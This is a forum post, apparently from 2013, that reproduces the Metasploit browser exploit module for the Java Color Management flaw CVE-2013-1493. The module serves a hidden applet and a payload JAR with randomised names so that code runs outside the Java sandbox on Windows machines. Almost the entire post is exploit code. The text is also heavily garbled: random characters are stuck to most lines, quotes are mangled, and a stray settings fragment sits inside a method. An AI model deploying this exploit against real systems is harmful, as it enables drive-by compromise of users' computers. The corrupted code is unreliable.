##7 |+ t9 `' T& {
1 \$ z9 Q2 d; K, _" @1 c
# This file is part of the Metasploit Framework and may be subject to
1 J5 O/ [1 q: \# Z# m3 J. r6 X- M# redistribution and commercial restrictions. Please see the Metasploit' C- H8 R$ D, |
# web site for more information on licensing and terms of use.
, [3 f4 f9 p. X2 t# http://metasploit.com/
3 X, t; X8 b4 w# s8 V6 J) b##
- B, I' H& J- c* ^9 Y$ ~require ‘msf/core’; A$ T1 B, Q- w T( h- @3 C: i2 h6 f+ A, M
require ‘rex’/ I8 N- X2 O( [5 {% |- B! \
class Metasploit3 < Msf::Exploit::Remote* p3 l6 Q, q9 o# C) \& J
Rank = NormalRanking$ `) _2 \3 k' L1 C; e; q
include Msf::Exploit::Remote::HttpServer::HTML
: G$ h) z g' W$ yinclude Msf::Exploit::EXE) i0 Q* t( ^1 b6 ^5 s
include Msf::Exploit::Remote::BrowserAutopwn9 m; S3 U7 c" x
autopwn_info({ :javascript => false })
: n. e5 g4 T( J* R" ]def initialize( info = {} ): N' p' E6 E6 H- p# r1 p1 I. A
super( update_info( info,& e: @8 b0 |8 u& B$ I+ B
‘Name’ => ‘Java CMM Remote Code Execution’,
5 z$ W; q+ l" r# x, q‘Description’ => %q{
- _8 m2 w! @; b/ z" z) LThis module abuses the Color Management classes from a Java Applet to run
|3 z+ L) A, Q6 rarbitrary Java code outside of the sandbox as exploited in the wild in February
8 Q. M; a5 z# |1 R3 t7 S1 N2 Sand March of 2013. The vulnerability affects Java version 7u15 and earlier and 6u41
' U4 w. z: d5 P& q2 x6 o% c3 Vand earlier and has been tested successfully on Windows XP SP3 and Windows 7 SP1* J' K6 n# G' q- H0 o' d* X
systems. This exploit doesn’t bypass click-to-play, so the user must accept the java% ^% S+ D$ S; O4 p6 B5 `, ?1 f) z& ?
warning in order to run the malicious applet.% B+ r5 b6 G/ K# s; l
},5 F2 @. O& ^3 `$ P$ I4 P
‘License’ => MSF_LICENSE,) d" N+ c+ W8 Q
‘Author’ =>( P( g* [: c2 Q0 s& |2 {6 u
'Unknown', # Vulnerability discovery and Exploit0 _$ g- x/ S" m
'juan vazquez' # Metasploit module (just ported the published exploit)) a5 m' C; O0 ?
],. |! l# Q, _# l' N0 d, Z2 ?& ^
‘References’ =>
) Z( O1 N7 ^; {; V: A2 K[8 X! W# s' i7 n) X5 P' }, f/ [
[ 'CVE', '2013-1493' ],. S: f; o. H5 d8 L$ k% ~6 p
[ 'OSVDB', '90737' ],$ u0 B1 b6 P& W- B8 l' J( Z
[ 'BID', '58238' ],- r4 C+ |+ P8 t3 g
[ 'URL', 'https://blogs.oracle.com/security/entry/security_alert_cve_2013_1493' ],2 P; W) I, h# l
[ 'URL', 'http://www.oracle.com/technetwork/topics/security/alert-cve-2013-1493-1915081.html' ],& X. o/ c& E; v% [% h0 \
[ 'URL', 'http://pastie.org/pastes/6581034' ]
$ c, W, {! p9 w. d5 x( c],+ }+ T% F; |" |
‘Platform’ => [ 'win', 'java' ],% J. @1 S( y7 n$ [& B H
‘Payload’ => { ‘Space’ => 20480, ‘BadChars’ => ”, ‘DisableNops’ => true },
$ J8 ?" z7 ^* e8 w‘Targets’ =>* Q% i7 b2 g% w/ M( U, o5 ~
[ e7 c! h) U& F6 P) ?
[ 'Generic (Java Payload)',
( h. I* P/ ^; q. H J, _1 Y{6 C: U' i1 m4 m/ I& r' I# z
'Platform' => 'java',
' a; e6 M* q3 h. E'Arch' => ARCH_JAVA
, I' I3 ]& t1 B% Z( `* {}
% P5 W# ]. L/ R) X5 F7 J, z* ?9 z],
$ S( U* b6 k4 ^& c[ 'Windows x86 (Native Payload)',
8 J% C. l/ N! Q; L3 J{
% {2 f8 a; {$ \) ?$ L6 Y1 E'Platform' => 'win',
2 o& s' e0 ?) ?: v: B# W0 ]8 K'Arch' => ARCH_X86* F' v7 E1 m- I2 P
}
2 V# E! g* [7 U]8 I" R8 d9 G: v! S; y
],
5 f& b: q8 Q: P9 ^# e‘‘DisclosureDate’ => ‘Mar 01 2013′
" e+ W6 Z R/ f n+ L)), l* h! s& }7 w7 Y/ C
end% O+ [7 E1 n) s: W% E8 C
def setup
$ G$ T" X& l7 g6 Rpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Init.class”)3 K3 X9 t7 [- s0 `7 p. m: H
@init_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
% [3 l" `* _# w5 q( Bpath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “Leak.class”)2 Y* ~: K3 Y" `
@leak_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }
5 g" k4 r2 e: Q% ]; Apath = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyBufferedImage.class”)2 g* R! [) {0 y( F
@buffered_image_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }) F8 K( }6 v3 H- N* S8 S
path = File.join(Msf::Config.install_root, “data”, “exploits”, “cve-2013-1493″, “MyColorSpace.class”)
% A, |* q; n2 V$ T! ` Y@color_space_class = File.open(path, “rb”) {|fd| fd.read(fd.stat.size) }# ~3 y) B; } A9 t3 O% s
@init_class_name = rand_text_alpha(“Init”.length)5 `! N. E9 q) R1 j$ x7 G. Z: t5 `' D. c
@init_class.gsub!(“Init”, @init_class_name): v2 T% Z# B* I) ~- g" c5 a8 D
super: |. P( e" j. g, v$ s) e
end
- c4 q6 K. c- L) H6 {- N+ f: z3 Hdef on_request_uri(cli, request). Z* Z+ q9 Z4 [
print_status(“handling request for #{request.uri}”)# G& E& ]* h4 M- k- i9 E n
case request.uri
4 g! P7 @+ w0 H4 k: [; _" n2 u9 wwhen /\.jar$/i- ]- \9 n' S* e4 R& ~/ Q
jar = payload.encoded_jar' F+ a: ~0 B& L" |
jar.add_file(“#{@init_class_name}.class”, @init_class)+ r4 V% a* v3 g. V
jar.add_file(“Leak.class”, @leak_class)6 R# j4 [. z: |' i# g
jar.add_file(“MyBufferedImage.class”, @buffered_image_class)
4 R! [5 r7 [- Y* [* {/ g2 G6 jjar.add_file(“MyColorSpace.class”, @color_space_class)
& I- w& P! F$ Q0 D3 y# bDefaultTarget’ => 1,
9 [/ K( j5 x/ G# `& a6 gmetasploit_str = rand_text_alpha(“metasploit”.length)
# ]6 b" A1 J% `2 o$ r0 M- z$ Dpayload_str = rand_text_alpha(“payload”.length)
, g( _) I: {& @- }, g3 @jar.entries.each { |entry|1 O @5 N+ D5 z& ^1 G! ]
entry.name.gsub!(“metasploit”, metasploit_str)
8 F Z2 b3 g6 B: Y) h9 M3 Gentry.name.gsub!(“Payload”, payload_str)
. Y8 y z: ]; t3 v5 u; Uentry.data = entry.data.gsub(“metasploit”, metasploit_str)
3 l- {6 D1 E" m2 dentry.data = entry.data.gsub(“Payload”, payload_str)
; `" j# K2 [- T8 E' R9 F: P}
5 C/ `! Q4 |. `7 sjar.build_manifest
( _/ @( e) n2 o* Xsend_response(cli, jar, { ‘Content-Type’ => “application/octet-stream” })
2 N! M1 v( F6 n; C2 f& a. v: Pwhen /\/$/
' {$ |4 |! n% X$ w! N) k Upayload = regenerate_payload(cli)5 i6 v8 G7 u% u. U5 u
if not payload8 ^9 D- [1 d* K0 a h
print_error(“Failed to generate the payload.”)9 @# E& o! _4 t/ S( Q
send_not_found(cli)
; {6 E0 }7 V! `return
4 r9 u2 R8 f4 g( t9 a4 Q" cend1 E8 ~( j- e0 z* F( _& z
send_response_html(cli, generate_html, { ‘Content-Type’ => ‘text/html’ }): T) m* d: j( D6 L# |& V
else1 S0 P6 e6 K% W, ~* p
send_redirect(cli, get_resource() + ‘/’, ”)+ w# O7 ?* w& d1 [/ K
end" x% ^. Q" V# W( Q7 \
end
' ^" [4 [- O: adef generate_html9 h, Y& C: Q6 H/ L6 Q3 O
html = %Q|<html><head><title>Loading, Please Wait…</title></head>| ^' E' e; m1 L! k6 |- j
html += %Q|<body><center><p>Loading, Please Wait…</p></center>| n; _+ B5 g8 b+ I3 _$ J% ?* l; ^
html += %Q|<applet archive=”#{rand_text_alpha(8)}.jar” code=”#{@init_class_name}.class” width=”1″ height=”1″>|
: C7 T' D0 ]: Y- ^html += %Q|</applet></body></html>|
# f% k) c3 @7 _return html. T) u, Z5 I( x
end" T3 H! V2 M5 f! U2 F# F0 ^
end
" n9 \% S( B4 M( V1 U. l$ f v* y- |end8 _ e9 t/ V0 s+ H: a* z9 ?
|
发表于 2013-4-4 17:31:17
收藏
支持
反对